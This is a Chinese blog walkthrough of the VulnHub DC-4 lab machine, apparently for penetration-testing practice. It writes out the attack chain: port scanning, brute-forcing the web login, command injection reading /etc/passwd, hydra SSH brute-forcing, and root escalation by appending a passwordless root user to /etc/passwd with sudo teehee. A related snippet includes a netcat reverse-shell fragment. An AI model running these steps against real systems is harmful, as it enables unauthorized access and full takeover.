[VulnHub]DC-4

最新推荐文章于 2023-01-28 18:25:03 发布
最新推荐文章于 2023-01-28 18:25:03 发布
阅读量133 收藏
点赞数 2
分类专栏: 渗透测试实战 文章标签: ssh linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/120147922
版权

测试人员:cosmos

目标地址:192.168.131.130

目标账号:未知

目标主机:未知

信息搜集

1.netdiscover

netdiscover -r 192.168.131.0/24

image-20210822152031980

2.masscan

masscan --rate=10000 --ports 0-65535 192.168.131.130

image-20210822152223001

3.nmap

nmap -A 192.168.131.130

image-20210822220917092

网站测试

进入网站

image-20210822152447241

发现需要登录,提示admin登录,猜测用户名是admin,利用burp爆破密码

image-20210822214545777

得到密码为happy,登录

image-20210822214818797

进入以后发现可以执行命令,我们抓包看看

image-20210822152610657

这里发现可以支持自己修改执行命令

根目录中没有内容,我们可以看看etc/passwd

在Linux 中/etc/passwd文件中每个用户都有一个对应的记录行,它记录了这个用户的一些基本属性。系统管理员经常会接触到这个文件的修改以完成对用户的管理工作。

cat+/etc/passwd

image-20210822215615335

我们发现了charles,jim,sam三个用户

依次查看三个用户的目录,jim目录下发现一份备份密码,保存下来

image-20210822220331697

因为开放了22端口,这个时候我们可以尝试连接ssh,利用hydra爆破密码

hydra 192.168.131.130 ssh -l jim -P bac.txt -t 20 -V -f

命令详细:

  • 攻击目标:192.168.131.130

  • 使用的模块:ssh

  • 爆破用户名:jim (-l)

  • 使用的密码字典:bac.txt (-P)

  • 爆破线程数:20 (-t)

  • 显示详细信息 (-V)

  • 爆破成功一个后停止 (-f)

    image-20210822225945247

账号:jim   密码:jibril04

ssh连接

接下来连接ssh

ssh jim@192.168.131.130

image-20210822224407050

查看mbox的内容,发现是一封信件

image-20210822224034957

而信件在var/mail目录,进入,发现有一封charles写的信并告知了密码

image-20210822223732113

账号:charles     密码:^xHhA&hvim0y

切换用户

su charles

使用sudo命令查看charles用户可以哪些具有root权限的命令,发现可以使用teehee命令

image-20210822224739714

teehee命令可以写入文件内容并不覆盖文件原有内容

使用teehee命令将一个无密码用户admin写入到/etc/passwd文件,并加入到root组中

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

切换到admin用户,成功提权

image-20210822225402775

Snakin_ya
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机 DC-4
菜浪马废的博客
03-23 399
信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口,访问一下页面 是个登录页面,而且可以用爆破来登录,没有验证机制 安装pydictor,一个字典生成工具,用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...
Vulnhub渗透测试靶机DC-4
weixin_46128614的博客
01-19 431
下载地址:https://www.vulnhub.com/entry/dc-4,313/ nmap没有扫描到什么有用端口 直接访问80端口 只有一个认证框 没有验证 bp爆破admin弱密码 发现密码admin qwert 进入后台 发现有执行命令的地方 抓包发现命令由post包传过去 执行的命令由客户端传到了服务端 命令执行获取shell 把nc -e /bin/sh 192.168.49...
vulnhub靶机之DC-4
m0_52328368的博客
08-19 1127
vulnhubdc-4详细步骤
Vulnhub靶场渗透-DC-4
paidx0
10-21 244
前言 靶机IP(192.168.110.134) 攻击机IP(192.168.110.127) 网络NAT模式 信息收集 访问80端口,提示以admin的用户名登录 直接爆破了,爆破结果是 admin:happy 漏洞利用 登录进去发现是个可以RCE的 思路是不是来了,很显然直接弹shell了 怎么弹shell就不多说了,我的靶场笔记很多都有写 存在三个用户 进入jim的backups文件夹发现了很多的旧密码,思路这不就又来了 开放ssh服务,很显然是要我们去爆破了 拿到jim的账号了,登
Vulnhub靶机实战——DC-4
冠霖L的博客
09-27 3081
靶机DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip 描述:从靶机DC-3开始,只有一个入口和一个最终的flag,只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境:Vmware 15 Pro虚拟机软件 DC-4靶机IP地址:192.168.220.138 Kali的IP地址:...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
VulnHubDC-4
weixin_39219503的博客
01-31 244
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-4,313/ 题目信息如下,只有一个flag Description DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...
Vulnhub DC-4
柠檬木有枝
07-14 234
Nmap 扫描主机,nmap -sS 192.168.6.0/24 访问服务是一个登陆页面,使用 burp 爆破用户名为 admin,密码为 happy /home/jim/backups 下发现 old-passwords.bak 读取一下 使用 hydra 爆破 ssh:hydra -l jim -P password.txt 192.168.6.130 ssh 用户名:jim,密码:...
Vulnhub-DC-4
KAKA的博客
07-04 276
扫描获取目标 IP 地址:192.168.67.135 nmap -sn 192.168.67.0/24 扫描目标,获取系统信息和开放端口:80 && 22 nmap -A -p- 192.168.67.135 (初步猜想就是通过 web 获取到系统用户密码,再通过 ssh 登陆最后提权的思路) 登陆 http://192.168.67.135 : 首先看下 wapplayzer,发现是 Nginx ,但暂时得不到详细版本,故先记录,以防备用 页面上写着:Admin Information
vulnhub-dc4
bqnagus
10-05 1152
vulnhub-dc4靶机复现
VulnHub DC: 4
spider的博客
12-01 224
下载地址 https://download.vulnhub.com/dc/DC-4.zip 从nmap 入手(靶机在192.168.1.106) nmap -sT -sV -sC 192.168.1.106 -O -p- 开放了80,22端口。 先上个80看看 只有一个登陆界面,尝试在username输入’or’1’='1 看看有没有sql注入。重定向回本页面。 ...
[Vulnhub] DC-4
weixin_63231007的博客
01-28 818
DC系列靶机-第四弹(hydra爆破密码+teehee命令提权)
vulnhub靶场,DC-4
kukudeshuo的博客
07-12 283
vulnhub靶场,DC-4 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-4(192.168.58.147) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.147 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机的80端口 就是一个登入页面,不知道账号密码,所以没有多大用处 网站目录扫描
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1707
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
dc-dc仿真电路 multisim
10-31
DC-DC仿真电路在Multisim软件中是一种用于模拟和调试DC-DC转换器的工具。它可以帮助工程师在设计和优化DC-DC转换器时进行电路仿真和性能分析。 首先,我们可以在Multisim中选择合适的电路元件来构建DC-DC转换器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值